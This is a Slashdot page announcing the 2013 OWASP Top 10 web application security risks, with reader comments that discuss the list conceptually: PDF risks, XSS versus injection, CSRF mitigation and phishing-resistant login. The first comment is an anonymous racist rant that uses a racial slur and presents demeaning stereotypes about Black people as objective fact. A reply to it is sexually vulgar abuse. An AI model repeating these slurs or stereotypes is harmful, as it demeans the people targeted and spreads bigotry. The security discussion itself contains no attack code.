Beta
×

Welcome to the Slashdot Beta site -- learn more here. Use the link in the footer or click here to return to the Classic version of Slashdot.

Thank you!

Before you choose to head back to the Classic look of the site, we'd appreciate it if you share your thoughts on the Beta; your feedback is what drives our ongoing development.

Beta is different and we value you taking the time to try it out. Please take a look at the changes we've made in Beta and  learn more about it. Thanks for reading, and for making the site better!

OWASP Top 10 2013 Released

timothy posted about a year ago | from the how-come-letterman-never-reads-these-on-air? dept.

Security 17

hypnosec writes "OWASP's Top 10, the Open Web Application Security Project's top 10 most critical web application security risks, has been updated and a new list for 2013 published. Last updated back in 2010, the organization has published the new list wherein the importance of cross-site scripting (XSS) and cross-site request forgery (CRSF) has been diluted a little, while risks related to broken session management and authentication have moved up a notch. Code injection, which was the topmost risk in 2010, has retained its position in the updated list. The 2013 Top Ten list (PDF) has been compiled based on half a million vulnerabilities discovered in thousands of applications from hundreds of vendors."

Sorry! There are no comments related to the filter you selected.

Programming Nerds Fail To Be Objective About Life! (-1)

Anonymous Coward | about a year ago | (#43997931)

Blacks don't think anything is their fault. Having more of themselves in prison than college at any given time is magically not their fault. Black kids that study and try to learn and do good in school to get ahead are beaten up. Did you think it was racist white kids doing that to then? Noooo... It's mainstream black kids. They beat up the black kids who study because they're "acting white". But somehow, that isn't their fault.

The crack epidemic in the 80s affected mostly blacks. Why? Because racist whites held guns to their heads and forced them to smoke crack? Nooo.... Because of their decisions to use crack. That they made. More than anybody else did. But somehow, that isn't their fault.

Black women disproportionally get most abortions. They disproportionally get knocked up out of wedlock and have kids they can't afford. If they thought abortion was expensive, just think about what it costs to raise a child. If they thought abortion was cheap, compare what birth control would have cost. Did racist whites hold guns to their heads and force them to copulate and get inseminated? Noooo.... But somehow, that isn't their fault.

Black fathers disproportionally abandon their children, leaving them as bastards raised by single mothers. Even though this causes all sorts of probelms, making the kids more likely to go to jail, to not go to college, to do drugs and alcohol, to be criminals, all sorts of shit. Did racist white people hold guns to these "father's" heads and make them abandon their children? Noooo... But somehow, that isn't their fault.

But if you don't like niggers and OBJECTIVELY EVALUATE WHO THEY ARE AND WHAT THEY DO and then draw YOUR OWN conclusions... somehow, that's YOUR fault.

Re:Programming Nerds Fail To Be Objective About Li (0)

Anonymous Coward | about a year ago | (#43998115)

Says the obese, mongoloid whose mom sneaks out during the day and night to get banged by big black cock.

Irony (4, Funny)

ThatsNotPudding (1045640) | about a year ago | (#43998207)

The offered list of vulnerabilities is in a pdf.

Re:Irony (0)

Anonymous Coward | about a year ago | (#43998379)

And what's ironic exactly?

Re:Irony (0)

Anonymous Coward | about a year ago | (#43998515)

PDFs are a common attack vector. Thanks Adobe!

Re:Irony (1)

Steve_Ussler (2941703) | about a year ago | (#43999485)

but coming from OWASP, they are ok.

Re:Irony (0)

Anonymous Coward | about a year ago | (#44001089)

but coming from OWASP, they are ok.

Are you sure? I'd hate to get stung.

Re:Irony (0)

Anonymous Coward | about a year ago | (#43998775)

And what's ironic exactly [about publishing the list of vulnerabilities in a PDF]?

That they are all about discussing and fixing vulnerabilities and yet release the results in a file format known for its vulnerabilities.

Re:Irony (0)

Anonymous Coward | about a year ago | (#43999375)

What vulnerabilities exist in the PDF format? You seem to be incorrectly conflating issues with a single PDF reader with the format. So again, what's the irony about using PDF?

Re:Irony (1)

guanxi (216397) | about a year ago | (#44001487)

What vulnerabilities exist in the PDF format? You seem to be incorrectly conflating issues with a single PDF reader with the format.

The same vulnerabilities exist in many PDF readers, such as JavaScript and remote file access, even if implemented differently in the various applications.

I guess no formats are vulnerable by that reasoning; there is no vulnerability in Flash or Word formats either; it's just the players.

Non-PDF link (4, Informative)

Anonymous Coward | about a year ago | (#43998369)

fortgot one (-1)

Anonymous Coward | about a year ago | (#43998541)

They forget the most critical security risk;
basing your application in the United States or using any services with US companies or companies with US based headquarters.
You get hacked automatically, and oftentimes legally, by the NSA and various other outfits.

These look familiar (1)

dkleinsc (563838) | about a year ago | (#43999433)

The really sad part about the OWASP Top 10 lists is that they don't change very much. In a perfect world, none of the 2010 top 10 would be on this list, because they would be solved, but the fact of the matter is that most organizations don't care.

Minor criticisms of top 10 list (3, Informative)

WaffleMonster (969671) | about a year ago | (#44000155)

1. I don't understand why XSS and Injection are listed as separate items. XSS attacks are by definition injection attacks. I think separating this out de-emphasizes an important conceptual understanding applicable to a lot more domains than databases and html. To their credit they say as much.

Referer checking should not have been kept out of the mitigation section for CSRF.

"Using components with known vulnerabilities" (A9) appears to be a subset of "Security misconfiguration" (A5)

The Detectibility scale is screwed up in my opinion. Every single item is either average or easy except Difficult designation of 'Using components with known vulnerabilities' (A9)... How hard can it be to check current versions of libraries your system is using? What makes A5 easy and A9 hard?

"Sensitive data exposure" (A6) I don't think belongs in the list. It is a political item... yea encrypting sounds good but at some point you need to store a decryption key to decrypt what is encrypted - management of keys and physical systems security and infrastructure is important but I'm not sure it fits within the context of the other items which are about preventing specific attacks not about how to make being owned less bad.

What I think is missing is focus on huge problem of tricking users via phishing / "homographic" attacks. First and foremost the whole concept of typing a password into a web form to login is fundementally fucked up. Its right up there with fake padlock icons displayed on web sites and "two-factor" banking site picturegram logins. The industry needs to fix this shit because they are making things worse by manipulating their users into thinking they are safe with totally irrelevant security assertions which phishers are more than happy to leverage to maximum effect.

Users should be trained to ONLY type passwords into special dialouges within their browsers. We deseperatly need a web authentication scheme with channel bindings that don't suck ass (e.g. sent in clear or offline brute force attacks). The closest thing to deployed that fits the bill I know of is TLS-SRP.

Re:Minor criticisms of top 10 list (0)

Anonymous Coward | about a year ago | (#44001135)

1. I don't understand why XSS and Injection are listed as separate items. XSS attacks are by definition injection attacks. I think separating this out de-emphasizes an important conceptual understanding applicable to a lot more domains than databases and html. To their credit they say as much.

They actually mean SQL Injection [owasp.org] .

Re:Minor criticisms of top 10 list (1)

styrotech (136124) | about a year ago | (#44002085)

The Detectibility scale is screwed up in my opinion. Every single item is either average or easy except Difficult designation of 'Using components with known vulnerabilities' (A9)... How hard can it be to check current versions of libraries your system is using?

I think they are referring to how easy it is for someone else to figure that out.

Re:Minor criticisms of top 10 list (0)

Anonymous Coward | about a year ago | (#44014501)

We should get rid of any remote password protocol.

I propose http://eccentric-authentication.org/ [eccentric-...cation.org]

Check for New Comments
Slashdot Login

Need an Account?

Forgot your password?